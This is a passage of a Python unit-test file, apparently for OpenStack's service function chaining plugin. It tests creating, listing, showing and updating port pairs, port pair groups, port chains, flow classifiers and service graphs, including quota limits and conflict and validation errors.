port_pair = self.deserialize(fmt or self.fmt, res)
yield port_pair
if do_delete:
self._delete('port_pairs', port_pair['port_pair']['id'])
def _create_service_graph(
self, fmt, service_graph=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
project_id = kwargs.get('project_id', self._tenant_id)
data = {'service_graph': service_graph or {}}
if ctx is None:
data['service_graph'].update({'project_id': project_id})
req = self.new_create_request(
'service_graphs', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def service_graph(self, fmt=None,
service_graph=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_service_graph(fmt, service_graph, **kwargs)
if res.status_int >= 400:
logging.error('create Service Graph result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
service_graph = self.deserialize(fmt or self.fmt, res)
yield service_graph
if do_delete:
self._delete('service_graphs', service_graph[
'service_graph']['id'])
def _get_expected_port_pair(self, port_pair):
return {
'name': port_pair.get('name') or '',
'description': port_pair.get('description') or '',
'egress': port_pair.get('egress'),
'ingress': port_pair.get('ingress'),
'service_function_parameters': port_pair.get(
'service_function_parameters') or {
'correlation': None, 'weight': 1
}
}
def _test_create_port_pair(self, port_pair, expected_port_pair=None):
if expected_port_pair is None:
expected_port_pair = self._get_expected_port_pair(port_pair)
with self.port_pair(port_pair=port_pair) as pp:
for k, v in expected_port_pair.items():
self.assertEqual(pp['port_pair'][k], v)
def _test_create_port_pairs(
self, port_pairs, expected_port_pairs=None
):
if port_pairs:
port_pair = port_pairs.pop()
if expected_port_pairs:
expected_port_pair = expected_port_pairs.pop()
else:
expected_port_pair = self._get_expected_port_pair(port_pair)
with self.port_pair(port_pair=port_pair) as pp:
for k, v in expected_port_pair.items():
self.assertEqual(pp['port_pair'][k], v)
def _get_expected_port_pair_group(self, port_pair_group):
ret = {
'name': port_pair_group.get('name') or '',
'description': port_pair_group.get('description') or '',
'port_pairs': port_pair_group.get('port_pairs') or [],
'port_pair_group_parameters': port_pair_group.get(
'port_pair_group_parameters'
) or {'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}}
}
if port_pair_group.get('group_id'):
ret['group_id'] = port_pair_group['group_id']
return ret
def _test_create_port_pair_group(
self, port_pair_group, expected_port_pair_group=None
):
if expected_port_pair_group is None:
expected_port_pair_group = self._get_expected_port_pair_group(
port_pair_group)
with self.port_pair_group(port_pair_group=port_pair_group) as pg:
for k, v in expected_port_pair_group.items():
self.assertEqual(pg['port_pair_group'][k], v)
def _test_create_port_pair_groups(
self, port_pair_groups, expected_port_pair_groups=None
):
if port_pair_groups:
port_pair_group = port_pair_groups.pop()
if expected_port_pair_groups:
expected_port_pair_group = expected_port_pair_groups.pop()
else:
expected_port_pair_group = self._get_expected_port_pair_group(
port_pair_group)
with self.port_pair_group(port_pair_group=port_pair_group) as pg:
for k, v in expected_port_pair_group.items():
self.assertEqual(pg['port_pair_group'][k], v)
@staticmethod
def _get_expected_port_chain(port_chain):
chain_params = port_chain.get('chain_parameters') or dict()
chain_params.setdefault('correlation', 'mpls')
chain_params.setdefault('symmetric', False)
ret = {
'name': port_chain.get('name') or '',
'description': port_chain.get('description') or '',
'port_pair_groups': port_chain['port_pair_groups'],
'flow_classifiers': port_chain.get('flow_classifiers') or [],
'chain_parameters': chain_params
}
if port_chain.get('chain_id'):
ret['chain_id'] = port_chain['chain_id']
return ret
def _test_create_port_chain(self, port_chain, expected_port_chain=None):
if expected_port_chain is None:
expected_port_chain = self._get_expected_port_chain(port_chain)
with self.port_chain(port_chain=port_chain) as pc:
for k, v in expected_port_chain.items():
self.assertEqual(pc['port_chain'][k], v)
def _test_create_port_chains(
self, port_chains, expected_port_chains=None
):
if port_chains:
port_chain = port_chains.pop()
if expected_port_chains:
expected_port_chain = expected_port_chains.pop()
else:
expected_port_chain = self._get_expected_port_chain(
port_chain)
with self.port_chain(port_chain=port_chain) as pc:
for k, v in expected_port_chain.items():
self.assertEqual(pc['port_chain'][k], v)
@staticmethod
def _get_expected_graph(service_graph):
ret = {
'name': service_graph.get('name') or '',
'description': service_graph.get('description') or '',
'port_chains': service_graph.get('port_chains')
}
return ret
def _test_create_service_graph(self, service_graph, expected_graph=None):
if expected_graph is None:
expected_graph = self._get_expected_graph(service_graph)
with self.service_graph(service_graph=service_graph) as graph:
for k, v in expected_graph.items():
self.assertEqual(graph['service_graph'][k], v)
class SfcDbPluginTestCase(
base.NeutronDbPluginV2TestCase,
test_flowclassifier_db.FlowClassifierDbPluginTestCaseBase,
SfcDbPluginTestCaseBase
):
resource_prefix_map = dict([
(k, sfc.SFC_PREFIX)
for k in sfc.RESOURCE_ATTRIBUTE_MAP.keys()
] + [
(k, fc_ext.FLOW_CLASSIFIER_PREFIX)
for k in fc_ext.RESOURCE_ATTRIBUTE_MAP.keys()
] + [
(k, sg_ext.SG_PREFIX)
for k in sg_ext.RESOURCE_ATTRIBUTE_MAP.keys()
])
def setUp(self, core_plugin=None, sfc_plugin=None,
flowclassifier_plugin=None, ext_mgr=None):
mock_log_p = mock.patch.object(sfc_db, 'LOG')
self.mock_log = mock_log_p.start()
cfg.CONF.register_opts(sfc.sfc_quota_opts, 'QUOTAS')
if not sfc_plugin:
sfc_plugin = DB_SFC_PLUGIN_CLASS
if not flowclassifier_plugin:
flowclassifier_plugin = (
test_flowclassifier_db.DB_FLOWCLASSIFIER_PLUGIN_CLASS)
service_plugins = {
sfc.SFC_EXT: sfc_plugin,
fc_ext.FLOW_CLASSIFIER_EXT: flowclassifier_plugin
}
sfc_db.SfcDbPlugin.supported_extension_aliases = [
sfc.SFC_EXT, sg_ext.SG_EXT, tap_ext.TAP_EXT]
sfc_db.SfcDbPlugin.path_prefix = sfc.SFC_PREFIX
fdb.FlowClassifierDbPlugin.supported_extension_aliases = [
fc_ext.FLOW_CLASSIFIER_EXT]
fdb.FlowClassifierDbPlugin.path_prefix = (
fc_ext.FLOW_CLASSIFIER_PREFIX
)
super(SfcDbPluginTestCase, self).setUp(
ext_mgr=ext_mgr,
plugin=core_plugin,
service_plugins=service_plugins
)
if not ext_mgr:
self.sfc_plugin = importutils.import_object(sfc_plugin)
self.flowclassifier_plugin = importutils.import_object(
flowclassifier_plugin)
# Note (vks1): Auto-load extensions.
ext_mgr = api_ext.PluginAwareExtensionManager.get_instance()
app = config.load_paste_app('extensions_test_app')
self.ext_api = api_ext.ExtensionMiddleware(app, ext_mgr=ext_mgr)
def test_create_port_chain(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']]})
def test_quota_create_port_chain(self):
cfg.CONF.set_override('quota_port_chain', 3, group='QUOTAS')
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg1['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg2['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg3['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg4['port_pair_group']['id']]
}, expected_res_status=409)
def test_create_port_chain_all_fields(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': False, 'correlation': 'mpls'}
})
def test_create_port_chain_all_fields_with_chain_id(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': False,
'correlation': 'mpls'},
'chain_id': 99
})
def test_create_port_chain_all_fields_with_symmetric(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': True, 'correlation': 'mpls'}
})
def test_create_port_chain_multi_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
self._test_create_port_chain({
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
})
def test_create_port_chain_shared_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2, self.port_pair_group(
port_pair_group={}
) as pg3:
self._test_create_port_chains([{
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}, {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg3['port_pair_group']['id']
]
}])
def test_create_port_chain_shared_port_pair_groups_different_order(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
self._test_create_port_chains([{
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}, {
'port_pair_groups': [
pg2['port_pair_group']['id'],
pg1['port_pair_group']['id']
]
}])
def test_create_port_chain_with_empty_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_none_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': None,
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_default_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {'symmetric': False,
'correlation': 'mpls'},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_nsh_correlation(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {'symmetric': False,
'correlation': 'nsh'},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_nsh_correlation_incompatible_ppg_fail(
self):
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'nsh'}
}) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2:
with self.port_pair_group(port_pair_group={
'port_pairs': [
pp1['port_pair']['id']
]
}) as ppg1, self.port_pair_group(port_pair_group={
'port_pairs': [
pp2['port_pair']['id']
]
}) as ppg2:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'symmetric': False,
'correlation': 'nsh'},
'port_pair_groups': [
ppg1['port_pair_group']['id'],
ppg2['port_pair_group']['id']],
}, expected_res_status=400)
def test_create_port_chains_with_conflicting_chain_ids(self):
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg1['port_pair_group']['id']],
'chain_id': 88
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg2['port_pair_group']['id']],
'chain_id': 88
}, expected_res_status=400
)
def test_create_port_chain_with_none_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': None,
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_empty_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'logical_source_port': port['port']['id']
}) as fc:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [fc['flow_classifier']['id']],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_multi_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}) as fc2:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_flow_classifiers_basic_the_same(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}) as fc2:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_multi_port_chain_with_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc1['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._test_create_port_chain({
'flow_classifiers': [
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg2['port_pair_group']['id']]
})
def test_create_multi_port_chain_with_conflict_flow_classifiers(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc1['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._create_port_chain(
self.fmt, {
'flow_classifiers': [
fc2['flow_classifier']['id']
],
'port_pair_groups': [
pg2['port_pair_group']['id']
]
},
expected_res_status=400
)
def test_create_multi_port_chain_with_same_flow_classifier(self):
with self.port(
name='test1'
) as port1:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._create_port_chain(
self.fmt, {
'flow_classifiers': [
fc['flow_classifier']['id']
],
'port_pair_groups': [
pg2['port_pair_group']['id']
]
},
expected_res_status=409
)
def test_create_port_chain_with_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'port_pairs': [
pp1['port_pair']['id']
]
}) as pg1, self.port_pair_group(port_pair_group={
'port_pairs': [
pp2['port_pair']['id']
]
}) as pg2:
self._test_create_port_chain({
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
})
def test_create_port_chain_with_empty_port_pair_groups(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': []},
expected_res_status=400
)
def test_create_port_chain_with_nonuuid_port_pair_group_id(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': ['unknown']},
expected_res_status=400
)
def test_create_port_chain_with_unknown_port_pair_group_id(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': [uuidutils.generate_uuid()]},
expected_res_status=404
)
def test_create_port_chain_with_same_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(
port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}
):
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=409
)
def test_create_port_chain_with_no_port_pair_groups(self):
self._create_port_chain(
self.fmt, {}, expected_res_status=400
)
def test_create_port_chain_with_consecutive_tap_port_pair_groups(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True
}
) as pg2:
self._create_port_chain(
self.fmt,
{
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
},
expected_res_status=400
)
def test_create_port_chain_with_non_consecutive_tap_port_pair_groups(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='default_device'
) as ingress_default, self.port(
name='port3',
device_id='default_device'
) as egress_default, self.port(
name='port4',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': ingress_default['port']['id'],
'egress': egress_default['port']['id']
}
) as default_pp, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}}
}
) as tap_pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [default_pp['port_pair']['id']],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}
}
}
) as default_pg, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}
}
}
}
) as tap_pg2:
self._test_create_port_chain(
{
'port_pair_groups': [
tap_pg1['port_pair_group']['id'],
default_pg['port_pair_group']['id'],
tap_pg2['port_pair_group']['id']
]
}
)
def test_create_port_chain_with_invalid_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'correlation': 'unknown'},
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_create_port_chain_with_invalid_chain_parameters_symmetric(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'symmetric': 'abc'},
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_create_port_chain_unknown_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'flow_classifiers': [uuidutils.generate_uuid()],
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=404
)
def test_create_port_chain_nouuid_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'flow_classifiers': ['unknown'],
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_list_port_chains(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
port_chains = [pc1, pc2]
self._test_list_resources(
'port_chain', port_chains
)
def test_list_port_chains_with_params(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'name': 'test1',
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
self._test_list_resources(
'port_chain', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_chain', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_chain', [],
query_params='name=test3'
)
def test_list_port_chains_with_unknown_params(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'name': 'test1',
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
self._test_list_resources(
'port_chain', [pc1, pc2],
query_params='hello=test3'
)
def test_show_port_chain(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'portchain',
'port_pair_groups': [pg['port_pair_group']['id']]
}) as pc:
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
expected = self._get_expected_port_chain(pc['port_chain'])
self._assert_port_chain_equal(res['port_chain'], expected)
def test_show_port_chain_noexist(self):
req = self.new_show_request(
'port_chains', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_chain_add_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_remove_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [
fc1['flow_classifier']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_replace_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [fc2['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_flow_classifiers_basic_the_same(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [fc2['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_conflict_flow_classifiers(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port1['port']['id']
}
) as fc2, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}
) as fc3:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}), self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']],
'flow_classifiers': [fc2['flow_classifier']['id']]
}) as pc2:
updates = {
'flow_classifiers': [fc3['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_chain_add_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
}) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
def test_update_port_chain_remove_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id'],
],
}) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
